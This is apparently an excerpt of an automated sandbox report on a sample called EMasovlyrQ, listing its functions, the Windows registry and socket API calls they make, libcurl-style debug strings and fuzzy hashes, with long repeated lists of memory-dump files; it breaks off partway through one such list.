Opcode Fuzzy Hash: d0d8e6c1bd3fd8d1b5057f8ac0bf1222d4ede440259ba5c19c3ea5c838cd3800
Instruction Fuzzy Hash: 81B1D370604306EFDB10DF24C985BA7BBE8AF56318F14892CE8595B2D2DB70EC55CBA1

Function 00972F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE ref: 00972FED
RegEnumKeyExA.KERNELBASE ref: 009731A5

Strings

d, xrefs: 00972FA0

Memory Dump Source

Source File: 00000000.00000002.2255053473.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.2255031448.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255597004.0000000000F88000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000000F8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001223000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.00000000012FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256045530.0000000001314000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256210886.00000000014CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256230665.00000000014CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256251127.00000000014CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256272174.00000000014CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_EMasovlyrQ.jbxd

Similarity

API ID: EnumOpen
String ID: d
API String ID: 3231578192-2564639436
Opcode ID: f2fa5fa4ebc5e529cd5af5b4292c6751f5eba53ce317df9638049a7336edd12e
Instruction ID: fd696a4fc2b630cf935a719fdb774ad8933337d57f45bcaef90da08c6b8cbc81
Opcode Fuzzy Hash: f2fa5fa4ebc5e529cd5af5b4292c6751f5eba53ce317df9638049a7336edd12e
Instruction Fuzzy Hash: 0671C5B49043199FDB00DF69C58579EBBF0FF85308F00886DE898A7311E7749A889F92

Function 009A9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 009A935D
setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 009A9389

Strings

cf-socket.c, xrefs: 009A92CF
Send failure: %s, xrefs: 009A93FB
send(len=%zu) -> %d, err=%d, xrefs: 009A9447

Memory Dump Source

Source File: 00000000.00000002.2255053473.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.2255031448.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255597004.0000000000F88000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000000F8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001223000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.00000000012FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256045530.0000000001314000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256210886.00000000014CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256230665.00000000014CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256251127.00000000014CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256272174.00000000014CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_EMasovlyrQ.jbxd

Similarity

API ID: Ioctlsetsockopt
String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
API String ID: 1903391676-2691795271
Opcode ID: c83b4ee7443a7df47745de02842e191005b208aea2c8a12417107fd234cfa08f
Instruction ID: f2eded324e46fc20c0064ec4f045fb1e2a0512b7ba36cf66ff11c33876c7eb33
Opcode Fuzzy Hash: c83b4ee7443a7df47745de02842e191005b208aea2c8a12417107fd234cfa08f
Instruction Fuzzy Hash: DE51E374604305ABEB11DF24C881FAAB7B9FF89314F148529FD489B2D2EB31E951C791

Function 009776A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32(multi.c,?,?,?,00973D4E,00000000,?,?,009807BF), ref: 009776EB

Strings

LIMIT %s:%d %s reached memlimit, xrefs: 00977712, 00977731
SEND %s:%d send(%lu) = %ld, xrefs: 009776F8
multi.c, xrefs: 009776DD, 009776E9
send, xrefs: 0097770B, 0097772A

Memory Dump Source

Source File: 00000000.00000002.2255053473.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.2255031448.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255597004.0000000000F88000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000000F8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001223000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.00000000012FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256045530.0000000001314000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256210886.00000000014CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256230665.00000000014CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256251127.00000000014CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256272174.00000000014CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_EMasovlyrQ.jbxd

Similarity

API ID: send
String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
API String ID: 2809346765-3388739168
Opcode ID: d226066d496c8467e09cda8e29aaa53f838272f49be6ce5952ff9947320b129d
Instruction ID: a78503920cb6d65e3cdd8d5df21a039e10dcd6d70b63155baa1ff4c4d9b71520
Opcode Fuzzy Hash: d226066d496c8467e09cda8e29aaa53f838272f49be6ce5952ff9947320b129d
Instruction Fuzzy Hash: 6F115CB2508318BBE5205794EC47E3BBBDCDBC1B28F554918BC0C23352D1A19C0482B3

Function 00CFD1B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 399
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 00CFD497
Inf, xrefs: 00CFDC85, 00CFDC9D
NaN, xrefs: 00CFDB8B

Memory Dump Source

Source File: 00000000.00000002.2255053473.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.2255031448.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255597004.0000000000F88000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000000F8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001223000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.00000000012FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256045530.0000000001314000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256210886.00000000014CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256230665.00000000014CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256251127.00000000014CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256272174.00000000014CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_EMasovlyrQ.jbxd

Similarity

API ID:
String ID: @$Inf$NaN
API String ID: 0-141429178
Opcode ID: 18cd676b03ca7bbae85e106649079b18c9f42cdd1a3e0cb01c525d329298b81b
Instruction ID: c22752bbf0491c2e2b869f3e3f3498442df4f6f1b9a93b4565ab293327ac4346
Opcode Fuzzy Hash: 18cd676b03ca7bbae85e106649079b18c9f42cdd1a3e0cb01c525d329298b81b
Instruction Fuzzy Hash: 1EF1C37160C3998BD7A08F25C0403BBBBE2AF85314F158A1DEADE87291D735DA45DB83

Function 00977770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

recv.WS2_32(?,?,?,?), ref: 009777BB

Strings

LIMIT %s:%d %s reached memlimit, xrefs: 009777E2, 00977801
recv, xrefs: 009777DB, 009777FA
RECV %s:%d recv(%lu) = %ld, xrefs: 009777C8

Memory Dump Source

Source File: 00000000.00000002.2255053473.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.2255031448.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255597004.0000000000F88000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000000F8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001223000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.00000000012FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256045530.0000000001314000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256210886.00000000014CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256230665.00000000014CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256251127.00000000014CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256272174.00000000014CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_EMasovlyrQ.jbxd

Similarity

API ID: recv
String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
API String ID: 1507349165-640788491
Opcode ID: ff07e07a171e1d01cee62b7d582916135e5f6773b61904d3b7b457349103f24d
Instruction ID: bdbb13e8cf73b98c45b1b5add0f735b0a79463d9ebf80478ea2857dba74344df
Opcode Fuzzy Hash: ff07e07a171e1d01cee62b7d582916135e5f6773b61904d3b7b457349103f24d
Instruction Fuzzy Hash: 921120B6619314BBE1209754EC4AE3BBB9CDBC6B68F564518BC0C63353E5619C04C1F2

Function 009775E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32(?,?,?), ref: 00977619

Strings

socket, xrefs: 00977643, 00977662
LIMIT %s:%d %s reached memlimit, xrefs: 0097764A, 00977669
FD %s:%d socket() = %d, xrefs: 0097762E

Memory Dump Source

Source File: 00000000.00000002.2255053473.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.2255031448.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255597004.0000000000F88000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000000F8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001223000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.00000000012FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256045530.0000000001314000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256210886.00000000014CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256230665.00000000014CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256251127.00000000014CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256272174.00000000014CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_EMasovlyrQ.jbxd

Similarity

API ID: socket
String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
API String ID: 98920635-842387772
Opcode ID: f3cd1c4d61cb33c877a29df27c6367e47bd062e70fed2902b0f1f171a9c3d169
Instruction ID: e674f02fdda4279af4fc88aa0a394dfd0e6c4ab2252dc5d4fbf810ef4bacf4ff
Opcode Fuzzy Hash: f3cd1c4d61cb33c877a29df27c6367e47bd062e70fed2902b0f1f171a9c3d169
Instruction Fuzzy Hash: 49114873A00321A7D62157A9BC07FAF7B88DFC1724F065524F818A72D3D2928898D2E2

Function 00CF8E90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 00CF8EAD

Strings

terminated, xrefs: 00CF8F20
@, xrefs: 00DB4BA1

Memory Dump Source

Source File: 00000000.00000002.2255053473.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.2255031448.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255597004.0000000000F88000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000000F8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001223000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.00000000012FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256045530.0000000001314000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256210886.00000000014CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256230665.00000000014CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256251127.00000000014CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256272174.00000000014CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_EMasovlyrQ.jbxd

Similarity

API ID: _open
String ID: terminated$@
API String ID: 4183159743-3016906910
Opcode ID: cfbeef2fe6f9ac96aa82626c9ecf97cbf8d6546e429c8517c91c0423a1c491e3
Instruction ID: 7fdd329b66ef22dc7b64232caff161341e85550618e03d567df9140b1f02538c
Opcode Fuzzy Hash: cfbeef2fe6f9ac96aa82626c9ecf97cbf8d6546e429c8517c91c0423a1c491e3
Instruction Fuzzy Hash: 9F417CB0904309CFCB40EF79C4446AEBBE4BB88314F048A2DE9A8D7281E734D809DB16

Function 009AA150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getsockname.WS2_32(?,?,00000080), ref: 009AA1C6

Strings

ssloc inet_ntop() failed with errno %d: %s, xrefs: 009AA23B
getsockname() failed with errno %d: %s, xrefs: 009AA1F0

Memory Dump Source

Source File: 00000000.00000002.2255053473.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.2255031448.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255597004.0000000000F88000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000000F8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001223000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.00000000012FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256045530.0000000001314000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256210886.00000000014CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256230665.00000000014CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256251127.00000000014CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256272174.00000000014CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_EMasovlyrQ.jbxd

Similarity

API ID: getsockname
String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
API String ID: 3358416759-2605427207
Opcode ID: 240676552ceb60c624df96e30248eda650f5f3eac78666821e1034d3f4e950df
Instruction ID: 1fd6ada4e822072594c625d9ec2d18741a25903738183bfc89a96a95d2ddf3b8
Opcode Fuzzy Hash: 240676552ceb60c624df96e30248eda650f5f3eac78666821e1034d3f4e950df
Instruction Fuzzy Hash: 5521D871848780BBF7269B18EC46FE677ACEF81324F040654FD9853151FB32698587E2

Function 0098D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202), ref: 0098D65B

Strings

iphlpapi.dll, xrefs: 0098D5F0
if_nametoindex, xrefs: 0098D606

Memory Dump Source

Source File: 00000000.00000002.2255053473.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.2255031448.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255597004.0000000000F88000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000000F8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001223000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.00000000012FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256045530.0000000001314000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256210886.00000000014CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256230665.00000000014CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256251127.00000000014CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256272174.00000000014CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_EMasovlyrQ.jbxd

Similarity

API ID: Startup
String ID: if_nametoindex$iphlpapi.dll
API String ID: 724789610-3097795196
Opcode ID: 13f868d7020baf3cee406d1d9307247082e4b30a5ae58b068462342a7b3d1557
Instruction ID: 10f34924864429675f31ffa35f7b5e3f9ec365b31a8f8ab4cfe17448a5b221de
Opcode Fuzzy Hash: 13f868d7020baf3cee406d1d9307247082e4b30a5ae58b068462342a7b3d1557
Instruction Fuzzy Hash: A30126D094234546FB117B38AD2B76A3AD86BD1304F891878E84C913D3FA69C88CC353

Function 00A3AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(FFFFFFFF,?,00000000), ref: 00A3AB9B
ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00A3ABE4

Memory Dump Source

Source File: 00000000.00000002.2255053473.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.2255031448.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255597004.0000000000F88000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000000F8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001223000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.00000000012FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256045530.0000000001314000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256210886.00000000014CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256230665.00000000014CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256251127.00000000014CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256272174.00000000014CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_EMasovlyrQ.jbxd

Similarity

API ID: ioctlsocketsocket
String ID:
API String ID: 416004797-0
Opcode ID: b2abe518304405e0ced190a407e008a44e25ccbafdad9e238b1eb94b4b3f4144
Instruction ID: 88a4790b5c0ea4a56bf91c05169a75fd425eac161cbb2f5f3c4ba3a8968df384
Opcode Fuzzy Hash: b2abe518304405e0ced190a407e008a44e25ccbafdad9e238b1eb94b4b3f4144
Instruction Fuzzy Hash: C6E1DF706043129BEB20CF24D885B6BB7E5EF99300F144A2CF9D98B291E775DD44CB92

Function 009778B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 009778BB

Strings

FD %s:%d sclose(%d), xrefs: 009778CB

Memory Dump Source

Source File: 00000000.00000002.2255053473.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.2255031448.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255597004.0000000000F88000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000000F8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
